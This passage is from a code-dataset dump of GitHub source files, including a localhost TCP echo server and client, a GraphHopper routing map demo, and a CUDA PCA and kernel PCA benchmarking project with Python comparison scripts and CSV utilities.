"path": "/TCP/server.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#-*-coding:utf-8-*-\n\nimport socket\nimport time\nimport threading\n\n#创建socket对象\ns = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n#获取树莓派主机名\n#host = socket.gethostname()\nhost = '127.0.0.1'\n#设置端口号\nport = 9999\n\n#绑定服务器地址和端口号\ns.bind((host,port))\n\n#监听,指定等待最大连接数5\ns.listen(5)\n\ndef tcplink(sock, addr):\n print('Accept new connection from %s:%s ' %addr)\n msg_recv = sock.recv(1024)\n sock.send(('Welcome %s' %msg_recv.decode('utf-8')).encode('utf-8'))\n while True:\n time.sleep(1)\n if msg_recv.decode('utf-8') == 'end':\n break\n\n sock.close()\nwhile True:\n sock, addr = s.accept()\n t = threading.Thread(target = tcplink, args=(sock, addr))\n t.start()\n \n"
},
{
"alpha_fraction": 0.557692289352417,
"alphanum_fraction": 0.5961538553237915,
"avg_line_length": 19,
"blob_id": "23f9d9017513dd4e48ada9b36859886f5e18094a",
"content_id": "eb23ea6894fe8008bde5c83edcf543ced4a68313",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 566,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 26,
"path": "/TCP/client.py",
"repo_name": "Drahow/python_sqlite",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n#-*-coding=utf-8-*-\n\nimport socket\nimport sys\nimport time\n\nhost = '127.0.0.1'\n#设置主机名端口号\nport = 9999\n#s.connect((host,port))\nwhile True:\n#创建TCP套接字,基于IPV4协议\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n#连接服务器\n s.connect((host,port))\n time.sleep(1)\n msg_send = input('Info want to send: ')\n if msg_send == 'end':\n break\n else: \n s.send(('%s'%msg_send).encode('utf-8'))\n msg_recv = s.recv(1024)\n print(msg_recv.decode('utf-8'))\n \ns.close()\n"
}
] | 3 |
ChristianRahn/moneystack
|
https://github.com/ChristianRahn/moneystack
|
cb5cdc50a7e2cc2ce5c0aac15f0f67827796803a
|
1d5d99bcc1d88f92fc30ba89b2a2fc872431f595
|
d4e658902d0402f97b29835475711a233f06918e
|
refs/heads/master
| 2016-09-06T19:12:42.014724 | 2013-04-07T23:31:21 | 2013-04-07T23:31:21 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7260273694992065,
"alphanum_fraction": 0.7287670969963074,
"avg_line_length": 27.153846740722656,
"blob_id": "63d950f6cda79b72141c07adf7b1133924b481d6",
"content_id": "c929692aef9f06b13c3009976c2fe9510cffc5e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 13,
"path": "/scripts/RemoveLineBreaks.py",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport argparse\nimport fileinput\n\nparser = argparse.ArgumentParser(description='Remove line breaks from Splitwise CSV dumps')\nparser.add_argument('--input', dest='input', help='Source file')\n\nargs = parser.parse_args()\n\nfor lines in fileinput.FileInput(args.input, inplace=1):\n lines = lines.strip()\n if lines == '': continue\n print lines"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 37.599998474121094,
"blob_id": "540794431e97fcb1e067c21d86ad011d8f4ada87",
"content_id": "898b0760ebf1e3288cdff3f0b4bb999a5ca284a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 192,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 5,
"path": "/README.md",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "# Bearing the moneyload over time\n\nA graphical analysis in a closed system of who bears the most money load (is owed the most) over an amount of time.\n\nPulling Splitwise data... at some point."
},
{
"alpha_fraction": 0.45780590176582336,
"alphanum_fraction": 0.4905063211917877,
"avg_line_length": 25.36111068725586,
"blob_id": "91091a642af4a1e0fa79e0cd8c513dc2674d3b3f",
"content_id": "f498d63814e34bf29e745da144c97f0a40eb2ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 36,
"path": "/moneystack.js",
"repo_name": "ChristianRahn/moneystack",
"src_encoding": "UTF-8",
"text": "(function(d3) {\n var margin = {top: 20, right: 20, bottom: 30, left: 50},\n width = 960 - margin.left - margin.right,\n height = 500 - margin.top - margin.bottom;\n \n console.log(margin);\n\n var x = d3.time.scale()\n .range([0,width]);\n \n var y = d3.scale.linear()\n .range([height,0]);\n \n var xAxis = d3.svg.axis()\n .scale(x)\n .orient(\"bottom\");\n \n var yAxis = d3.svg.axis()\n .scale(y)\n .orient(\"left\");\n \n var area = d3.svg.area()\n .x(function(d) {return x(d.date)})\n .y0(function(d) {return d.y0;})\n .y1(function(d) {return d.y0 + d.y1;});\n \n var stack = d3.layout.stack()\n .values(function(d) {return d.values;});\n \n var svg = d3.select(\"body\").append(\"svg\")\n \n d3.csv(\"splitwise.csv\", function(error, data) {\n console.log(data);\n console.log(error);\n });\n})(d3);"
}
] | 3 |
karussell/directions-api-python
|
https://github.com/karussell/directions-api-python
|
6ed658d46c865795e83d6aab9ec3871433475845
|
fa5775a24eea6f0eff39a83edba44eb7222ac385
|
9ed5e284dda1bda89a200f215505ef22fd3b02d5
|
refs/heads/master
| 2020-04-06T03:37:36.232174 | 2016-07-11T13:13:45 | 2016-07-11T13:13:45 | 63,068,949 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7534562349319458,
"alphanum_fraction": 0.7580645084381104,
"avg_line_length": 19.66666603088379,
"blob_id": "a6e6ecd4168050520f8908457f3a82df5dccaa6a",
"content_id": "09318a11c4c273cb4344049ef0e38b908f3cad71",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 434,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 21,
"path": "/README.md",
"repo_name": "karussell/directions-api-python",
"src_encoding": "UTF-8",
"text": "# Try GraphHopper Directions API with Python\n\nThis repository contains a python test project to create a simple map displaying maps and in future versions using \nthe python client of the GraphHopper Route Optimization API. It uses [folium](https://github.com/python-visualization/folium) to create the maps.\n\n## Installation\n\n```\npip install folium\n```\n\n## Run\n\n```\npython test.py\nfirefox osm.html\n```\n\n## License\n\nApache License 2.0\n"
},
{
"alpha_fraction": 0.6075156331062317,
"alphanum_fraction": 0.7014613747596741,
"avg_line_length": 27.176469802856445,
"blob_id": "d8bfed2662fed2a9227d876ddf470ec7237339cd",
"content_id": "ceef3580f3fe63b5af2a3606458f11dc45b17a62",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 479,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 17,
"path": "/test.py",
"repo_name": "karussell/directions-api-python",
"src_encoding": "UTF-8",
"text": "import urllib, json\nimport folium\n\nmap = folium.Map(location=[49.838319, 6.4748])\n\nkey = \"016f1b38-62f0-4a2b-88f7-dc5b743a9b56\"\nurl = \"https://graphhopper.com/api/1/route?point=49.156562%2C6.47644&point=49.837982%2C6.47644&type=json&points_encoded=false&key=\" + key\n\nresponse = urllib.urlopen(url)\ndata = json.loads(response.read())\ntmp = data[\"paths\"][0][\"points\"]\n# print tmp\ngeo_data = { \"type\": \"LineString\", \"coordinates\": tmp[\"coordinates\"] };\n\nfolium.GeoJson(geo_data).add_to(map)\n\nmap.save('osm.html')\n"
}
] | 2 |
tjohanne/PCA
|
https://github.com/tjohanne/PCA
|
b879758dfcca2657a83bacc063c670223f8b1be1
|
7c201634767d475f682b07636f83f3db86ff01c6
|
531019738684a5d4b8023e4d1fd66b8930d8d1ec
|
refs/heads/main
| 2023-04-23T19:12:59.389300 | 2021-05-13T17:49:22 | 2021-05-13T17:49:22 | 361,269,049 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6217054128646851,
"alphanum_fraction": 0.6351421475410461,
"avg_line_length": 29.234375,
"blob_id": "ef42f0890500aad0b0b5517274a853bce8e78724",
"content_id": "c50de67dfb71a2aa62b46415311d20853aabf318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1935,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 64,
"path": "/bench/cumlkpca/main.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "// main.cpp\n#include <stdio.h>\n#include <iostream>\n#include <cuml/decomposition/params.hpp>\n#include <cuml/decomposition/kpca.hpp>\n#include <cuml/matrix/kernelparams.h>\n\n#include <cuda_runtime.h>\n\n#include <raft/handle.hpp>\n#include <raft/mr/device/allocator.hpp>\n#include <raft/cudart_utils.h>\n#include <raft/linalg/cublas_wrappers.h>\n\n#include <raft/cuda_utils.cuh>\n#include \"../../src/csv.cpp\"\n\nint main(int argc, char *argv[]) {\n cudaStream_t stream = CUDA_CHECK(cudaStreamCreate(&stream));\n raft::handle_t handle;\n handle.set_stream(stream);\n std::cout << \"Here\\n\";\n // load data file\n std::string filename = argv[1];\n std::cout << \"Here\\n\" << \" ../../data/\" + filename;\n csvInfo csv = read_csv(\"../../data/\" + filename);\n std::cout << \"Here\\n\";\n\n // number of principal components to find\n int n_components = std::stoi(argv[2]);\n std::string kernel = argv[3];\n\n ML::paramsKPCA prms;\n float* data;\n float* trans_data;\n int len = csv.rows * csv.cols;\n raft::allocate(data, len);\n raft::allocate(trans_data, csv.rows * n_components); // transformed data\n\n std::vector<T> data_h = {1.0, 2.0, 5.0, 4.0, 2.0, 1.0};\n data_h.resize(len);\n raft::update_device(data, csv.matrix, len, stream);\n prms.n_cols = 2;\n prms.n_rows = 3;\n prms.n_components = 4;\n prms.kernel = MLCommon::Matrix::KernelParams{MLCommon::Matrix::LINEAR, 0, 0.0, 0.0};\n if(kernel == \"POLYNOMIAL\") {\n prms.kernel.kernel = MLCommon::Matrix::POLYNOMIAL;\n }\n else if(kernel == \"RBF\") {\n prms.kernel.kernel = MLCommon::Matrix::RBF;\n }\n else if(kernel == \"TANH\") {\n prms.kernel.kernel = MLCommon::Matrix::TANH;\n }\n else if(kernel != \"LINEAR\") {\n std::cout << kernel << \" is not a valid kernel type \" << std::endl;\n exit(1);\n }\n std::cout << \"prms.n_cols \" << prms.n_cols << std::endl;\n std::cout << \"kernel \" << prms.kernel.coef0 << std::endl;\n std::cout << \"kernel \" << prms.kernel.kernel << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.5995989441871643,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 32.977272033691406,
"blob_id": "d706ec13e8087378533cac0bd3e362f3edf934a4",
"content_id": "fdd167e58d81950032a076f6eac83f6bf71ad3c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1496,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 44,
"path": "/bench/kernelpca/kernelpca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import sklearn\nimport numpy as np\nfrom sklearn.decomposition import KernelPCA\nfrom scipy import linalg\nfrom scipy.sparse.linalg import eigsh\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.utils.validation import check_is_fitted, _check_psd_eigenvalues\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import KernelCenterer\nfrom sklearn.metrics.pairwise import pairwise_kernels\nfrom sklearn import datasets\nfrom datetime import datetime as dt\n\n# test = \"manual\"\ntest = \"iris\"\n\nX = np.array([[1.0, 2.0, 5.0], [4.0, 2.0, 1.0]]).T\n\nif test == \"iris\":\n print(\"Loading iris dataset\")\n iris = datasets.load_iris()\n X = iris.data\n y = iris.target\nprint(\"Shape\", X.shape)\ntime_init_pca = dt.now()\nkpca = KernelPCA(n_components=None\n , kernel='linear'\n , gamma=None\n , degree=3\n , coef0=1\n , kernel_params=None\n , alpha=1.0\n , fit_inverse_transform=False\n , eigen_solver='auto'\n , tol=0\n , max_iter=None\n , remove_zero_eig=False\n , random_state=None\n , copy_X=True\n , n_jobs=-1)\nkpca.fit_transform(X)\n\n# print(\"SKLEARN KPCA Time for fit_transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\nprint(\"SKLEARN KPCA Total time for fit_transform {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))\n\n"
},
{
"alpha_fraction": 0.647948145866394,
"alphanum_fraction": 0.6954643726348877,
"avg_line_length": 24.5,
"blob_id": "073f5898e2fd624b95c1a0e5bfae80fede1c94a8",
"content_id": "6606d75528e22d142af864122345a18ea8a9d41d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 463,
"license_type": "no_license",
"max_line_length": 165,
"num_lines": 18,
"path": "/scripts/compute_profile.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n\nDATA=mnist_784.csv\nNCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\nSOLVER=jacobi\necho \"MNIST PCA\"\nncu -o profile --target-processes all --details-all --print-summary per-gpu --replay-mode application ./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n\n\n\n"
},
{
"alpha_fraction": 0.6339869499206543,
"alphanum_fraction": 0.6535947918891907,
"avg_line_length": 35.931034088134766,
"blob_id": "7eff989873c75619829d05960cfd23048bb65608",
"content_id": "6a96424cb2b64f87d957b1c32104522e223fc51f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 29,
"path": "/bench/sklearn/helpers.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\ndef plot_faces(faces, method, result_path, dataset_name):\n fig, axes = plt.subplots(8, 8, figsize=(8, 8))\n for i, ax in enumerate(axes.flat):\n ax.imshow(faces[i].reshape(64, 64), cmap=plt.cm.bone)\n\n plt.title(\"Eigenfaces - Raw Inputs\")\n plt.savefig(f'{result_path}{dataset_name}-{method}.png')\n plt.show()\n\ndef plot_components(components, ncomponents, result_path, dataset_name, method):\n fig = plt.figure(figsize=(16, 6))\n for i in range(30):\n ax = fig.add_subplot(3, 10, i + 1, xticks=[], yticks=[])\n ax.set_title(f\"Comp. {i}\")\n ax.imshow(components[i].reshape((64, 64)), cmap=plt.cm.bone)\n \n plt.savefig(f'{result_path}{dataset_name}-PCA-components-{ncomponents}-method-{method}.png')\n\n\ndef reconstruction(Y, C, M, h, w, image_index):\n n_samples, n_features = Y.shape\n weights = np.dot(Y, C.T)\n centered_vector=np.dot(weights[image_index, :], C)\n recovered_image=(M+centered_vector).reshape(h, w)\n return recovered_image\n"
},
{
"alpha_fraction": 0.5791832804679871,
"alphanum_fraction": 0.5886453986167908,
"avg_line_length": 29.907691955566406,
"blob_id": "e3c048ec50e843ad386bf77e4ee94dae9d1c59b7",
"content_id": "015b19ffb6c706887509d9ff783e48b2a7faa85b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2008,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 65,
"path": "/bench/sklearn/sklearn_pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom sklearn.decomposition import PCA\nfrom time import perf_counter\nfrom helpers import *\n\n# set dataset name\ndata_file_name = \"face_data.csv\"\ndataset_name = \"Eigenfaces\"\n# dataset_name = \"mnist_784.csv\"\n# dataset_name = \"iris.csv\"\ndata_dir = \"/home/gh/kernelpca/files/\"\nresult_path = \"/home/gh/kernelpca/bench/sklearn/images/\"\nfile_name = data_dir + data_file_name\n\n# read data\nX = pd.read_csv(file_name)\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\nX = X.values\n\nprint(f\"file: {file_name}, shape {X.shape}\")\n\nif dataset_name == \"Eigenfaces\":\n plot_faces(faces=X, method=\"raw\", result_path=result_path, dataset_name=dataset_name)\n\n# run, time, and plot Vanilla PCA\nncomponents = 400\nSVD_METHODS = ['auto', 'randomized', 'arpack']\n\nfor method in SVD_METHODS:\n try:\n time1 = perf_counter()\n pca = PCA(n_components=None\n , copy=True\n , whiten=False\n , svd_solver=method\n , tol=1.e-9\n , iterated_power='auto'\n , random_state=42)\n X_transformed = pca.fit_transform(X)\n time2 = perf_counter()\n\n \n if dataset_name == \"Eigenfaces\":\n plot_components(pca.components_\n , ncomponents=ncomponents\n , result_path=result_path\n , dataset_name=dataset_name\n , method=method)\n # plot_faces(X_transformed, mode=f\"PCA-{method}\")\n\n print(f\"X_transformed shape {X_transformed.shape}\")\n print(f\"sklearn method {method} - seconds: {time2-time1}\")\n except Exception as e:\n print(e)\n print(f\"Error - method {method}\")\n pass\n\n\n# recovered_images=[reconstruction(Y, C, M, h, w, i) for i in range(len(images))]\n# plot_portraits(recovered_images, celebrity_names, h, w, n_row=4, n_col=4)"
},
{
"alpha_fraction": 0.6168003678321838,
"alphanum_fraction": 0.6540821194648743,
"avg_line_length": 28.859155654907227,
"blob_id": "cccc67823b774f389a71997dacdd0e029210267a",
"content_id": "1892654e3e9b5d10e4d93000eb26894b3b642bdc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2119,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 71,
"path": "/bench/stack/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom numpy import linalg as la\nnp.random.seed(42)\n\n\ndef flip_signs(A, B):\n \"\"\"\n utility function for resolving the sign ambiguity in SVD\n http://stats.stackexchange.com/q/34396/115202\n \"\"\"\n signs = np.sign(A) * np.sign(B)\n return A, B * signs\n\n\n# Let the data matrix X be of n x p size,\n# where n is the number of samples and p is the number of variables\n# n, p = 5, 3\n# X = np.random.rand(n, p)\nX = np.array([[1.0, 2.0, 3.0, 41.0], [4.0, 5.0, 6.0, 22.0], [8.0, 5.0, 11.0, 66.0], [22.0, 5.0, 33.0, 77.3], [6.0, 8.0, 10.0, 88.4]])\nn, p = X.shape\nprint(\"n\", n)\nprint(\"p\", p)\n# Let us assume that it is centered\nprint(\"X\", X)\nX -= np.mean(X, axis=0)\nprint(\"X\", X)\n# the p x p covariance matrix\nC = np.cov(X, rowvar=False)\nprint(\"C = \\n\", C)\n# C is a symmetric matrix and so it can be diagonalized:\nl, principal_axes = la.eig(C)\n# sort results wrt. eigenvalues\nidx = l.argsort()[::-1]\nl, principal_axes = l[idx], principal_axes[:, idx]\n# the eigenvalues in decreasing order\nprint(\"l = \\n\", l)\n# a matrix of eigenvectors (each column is an eigenvector)\nprint(\"V = \\n\", principal_axes)\n# projections of X on the principal axes are called principal components\nprincipal_components = X.dot(principal_axes)\nprint(\"Y = \\n\", principal_components)\n\n# we now perform singular value decomposition of X\n# \"economy size\" (or \"thin\") SVD\nU, s, Vt = la.svd(X, full_matrices=False)\nV = Vt.T\nS = np.diag(s)\nprint(\"SVD U\", U)\nprint(\"SVD V\", V)\nprint(\"SVD S\", S)\n\n# 1) then columns of V are principal directions/axes.\nassert np.allclose(*flip_signs(V, principal_axes))\n\n# 2) columns of US are principal components\nassert np.allclose(*flip_signs(U.dot(S), principal_components))\n\n# 3) singular values are related to the eigenvalues of covariance matrix\nassert np.allclose((s ** 2) / (n - 1), l)\n\n# 8) dimensionality reduction\nk = 2\nPC_k = principal_components[:, 0:k]\nUS_k = U[:, 0:k].dot(S[0:k, 0:k])\nassert np.allclose(*flip_signs(PC_k, US_k))\nprint(\"PC_k\", PC_k)\nprint(\"US_k\", US_k)\n# 10) we used \"economy size\" (or \"thin\") SVD\nassert U.shape == (n, p)\nassert S.shape == (p, p)\nassert V.shape == (p, p)"
},
{
"alpha_fraction": 0.6253229975700378,
"alphanum_fraction": 0.682170569896698,
"avg_line_length": 20.27777862548828,
"blob_id": "6e2d92cc0923612fb7a9e09d002c0e9f5d99dd47",
"content_id": "da70f11810eb688d7a3b2a8f02d7e8f32e5f0cfd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 387,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 18,
"path": "/scripts/systems_profile.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n\nDATA=mnist_784.csv\nNCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\nSOLVER=jacobi\necho \"MNIST PCA\"\nnsys profile --stats=true ./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n\n\n\n"
},
{
"alpha_fraction": 0.5409705638885498,
"alphanum_fraction": 0.5552904009819031,
"avg_line_length": 29.670732498168945,
"blob_id": "43846a2f74c1405f9a6e35e22b5e766d37985093",
"content_id": "ba6867ffcb9d0b16813da1b6a05f7b6c909c733a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2514,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 82,
"path": "/scripts/compareSolvers.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport pandas as pd \n\ndatasets = [\"iris\"]\ndata_folder = \"../output/\"\nmatrices = [\"alphas\", \"lambdas\", \"trans_data\"]\nkernels = [\"LINEAR\", \"RBF\", \"POLYNOMIAL\"]\ncuml_files = []\nsk_files = []\nfor dataset in datasets:\n for kernel in kernels:\n for matrix in matrices:\n cuml_files.append(\"CUMLKPCA_\" + dataset + \"_\" + kernel + \"_\" + matrix + \".csv\")\n sk_files.append(\"SKKPCA_\" + dataset + \"_\" + kernel + \"_\" + matrix + \".csv\")\n\n\n\nprint(\"cuml files\", cuml_files)\nprint(\"sk_files files\", sk_files)\nfor cuml, skpca in list(zip(cuml_files, sk_files)):\n print(\"Checking \", cuml, skpca)\n cuml_m = np.absolute(pd.read_csv(data_folder + cuml).values)\n sk_m = np.absolute(pd.read_csv(data_folder + skpca, header=None).values)\n\n # trim to scikit learn's ncomponents\n if \"lambdas\" not in cuml:\n cuml_m = cuml_m.T\n cuml_m = cuml_m[:, :sk_m.shape[-1]]\n else:\n cuml_m = cuml_m[:sk_m.shape[0]]\n # print(cuml_m.shape)\n\n print(f\"cuml vals: {cuml_m[:2]}\")\n print(f\"sk_m vals: {sk_m[:2]}\")\n idx = zip(*np.where(~np.isclose(cuml_m, sk_m, rtol=1e-1)))\n\n\n counter = 0\n for x, y in idx:\n print(\"x y\", x, y)\n print(\"MISMATCH idx\", x, y, \" cuml \", cuml_m[x][y], \" sk_m\", sk_m[x][y])\n counter += 1\n if counter > 4:\n break\n\n\n\n if(not np.allclose(cuml_m, sk_m, rtol=1e-1)):\n print(\"MISMATCH cuml\", cuml, \" skpca\", skpca)\n print(\"First 20 cuml \", cuml_m[:10, :10])\n print(\"First 20 sk_m \", sk_m[:10, :10])\n\n\n\n\n\n\n\n# jacobi_data = \"../output/jacobi_\"\n# approx_data = \"../output/approx_\"\n# result_path = \"../bench/sklearn/images/\"\n# approx = \"approx\"\n# jacobi = \"jacobi\"\n\n# jU_file_name = jacobi_data + dataset\n# jS_file_name = jacobi_data + \"S_\" + dataset\n# jVT_file_name = jacobi_data + \"V_\" + dataset\n\n# aU_file_name = approx_data + dataset\n# aS_file_name = approx_data + \"S_\" + dataset\n# aVT_file_name = approx_data + \"V_\" + dataset\n\n# a_S = pd.read_csv(aS_file_name).values\n# j_S = pd.read_csv(jS_file_name).values\n# a_U = pd.read_csv(aU_file_name).values\n# j_U = pd.read_csv(jU_file_name).values\n# a_VT = pd.read_csv(aVT_file_name).values\n# j_VT = pd.read_csv(jVT_file_name).values\n# print(a_U[:10], j_U[:10], sep=\"\\n=======\\n\")\n# print('S', np.allclose(a_S, j_S, rtol=1e-02))\n# print('U', np.allclose(a_U, j_U, rtol=1e-02))\n# print('VT', np.allclose(a_VT, j_VT, rtol=1e-02))"
},
{
"alpha_fraction": 0.5667917728424072,
"alphanum_fraction": 0.5709869861602783,
"avg_line_length": 26.119760513305664,
"blob_id": "cf4db5c7851ddcfb041599c60ecb61c784419349",
"content_id": "ab3137c8dc1eecefd0eb4afb8c54cdf51e65ff61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4529,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 167,
"path": "/src/csv.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "\n#include <fstream>\n#include <iostream>\n#include <sstream> // std::stringstream\n#include <stdexcept> // std::runtime_error\n#include <string>\n#include <utility> // std::pair\n#include <vector>\n#include \"include/timelogger.h\"\nclass csvInfo {\npublic:\n float *matrix;\n int cols;\n int rows;\n std::vector<std::string> column_names;\n};\n/**\n * Based on this:\n * https://www.gormanalysis.com/blog/reading-and-writing-csv-files-with-cpp/\n */\ncsvInfo read_csv(std::string filename, bool ignore_last_col = true,\n bool col_major = true) {\n // Reads a CSV file into a vector of <string, vector<int>> pairs where\n // each pair represents <column name, column values>\n\n // Create a vector of <string, int vector> pairs to store the result\n std::vector<std::string> col_names;\n csvInfo csv;\n // Create an input filestream\n std::ifstream myFile(filename);\n int num_lines = 0;\n int num_cols = 0;\n // Make sure the file is open\n if (!myFile.is_open())\n throw std::runtime_error(\"Could not open file\");\n\n // Helper vars\n std::string line, colname;\n float val;\n\n // Read the column names\n if (myFile.good()) {\n // Extract the first line in the file\n std::getline(myFile, line);\n\n // Create a stringstream from line\n std::stringstream ss(line);\n\n // Extract each column name\n while (std::getline(ss, colname, ',')) {\n\n // Initialize and add <colname, int vector> pairs to result\n col_names.push_back(colname);\n }\n }\n while (std::getline(myFile, line))\n ++num_lines;\n if (ignore_last_col) {\n col_names.pop_back();\n }\n num_cols = col_names.size();\n myFile.clear();\n myFile.seekg(0);\n std::getline(myFile, line);\n float *matrix = new float[num_cols * num_lines];\n // Read data, line by line\n int index = 0;\n int curr_col = 0;\n while (std::getline(myFile, line)) {\n // Create a stringstream of the current line\n std::stringstream ss(line);\n\n // Extract each float\n while (ss >> val) {\n if (curr_col < num_cols) {\n if (col_major) {\n matrix[index] = val;\n } else {\n matrix[index] = val;\n }\n }\n\n // If the next token is a comma, ignore it and move on\n if (ss.peek() == ',')\n ss.ignore();\n\n // Increment the column index\n index++;\n curr_col++;\n if (curr_col == num_cols) {\n std::string temp;\n ss >> temp;\n }\n }\n curr_col = 0;\n }\n\n // Close file\n myFile.close();\n csv.matrix = matrix;\n csv.cols = num_cols;\n csv.rows = num_lines;\n csv.column_names = col_names;\n return csv;\n}\n\nvoid write_matrix_csv(std::string filename, float *matrix, int rows, int cols,\n bool write_col_names = true) {\n std::ofstream myFile(filename);\n\n // Send column names to the stream\n if (write_col_names) {\n for (int j = 0; j < cols; j++) {\n myFile << j;\n if (j != cols - 1)\n myFile << \",\"; // No comma at end of line\n }\n myFile << \"\\n\";\n }\n\n // Send data to the stream\n for (int i = 0; i < rows; i++) {\n for (int j = 0; j < cols; ++j) {\n myFile << matrix[i * cols + j];\n if (j != cols - 1)\n myFile << \",\"; // No comma at end of line\n }\n myFile << \"\\n\";\n myFile.flush();// TODO try flushing\n }\n // Close the file\n myFile.close();\n}\n\nvoid print_csv(csvInfo csv) {\n float *matrix = csv.matrix;\n int rows = csv.rows;\n int cols = csv.cols;\n for (int i = 0; i < rows; i++) {\n for (int j = 0; j < cols; j++) {\n std::cout << matrix[i * cols + j];\n if (j != cols - 1)\n std::cout << \",\";\n }\n std::cout << std::endl;\n }\n std::cout << \"first \" << csv.matrix[0] << std::endl;\n std::cout << \"last \" << csv.matrix[(csv.rows - 1) * csv.cols + csv.rows - 1]\n << std::endl;\n std::cout << \"cols \" << csv.cols << std::endl;\n std::cout << \"rows \" << csv.rows << std::endl;\n std::cout << \"first col name \" << csv.column_names[0] << std::endl;\n}\n\nvoid write_logs(TimeLogger* logger) {\n std::string filename = logger->log_name;\n std::ofstream myFile(filename);\n myFile << \"Function Name,Features,Samples,N Components,Time(ms)\\n\";\n std::vector<TimeLogger::timeLog*> logs = logger->logs;\n for(unsigned int i = 0; i < logs.size(); i++) {\n myFile << logs[i]->name << \",\" << logs[i]->features << \",\" << logs[i]->samples \n << \",\" << logs[i]->n_components << \",\" << logs[i]->time_ms << \"\\n\";\n free(logs[i]);\n }\n std::cout << \"Wrote \" << logs.size() << \" time measurements to \" << filename << std::endl;\n free(logger);\n myFile.close();\n}"
},
{
"alpha_fraction": 0.6252390146255493,
"alphanum_fraction": 0.6826003789901733,
"avg_line_length": 18.370370864868164,
"blob_id": "51403144e8d590929e1010744c9070df990aff9c",
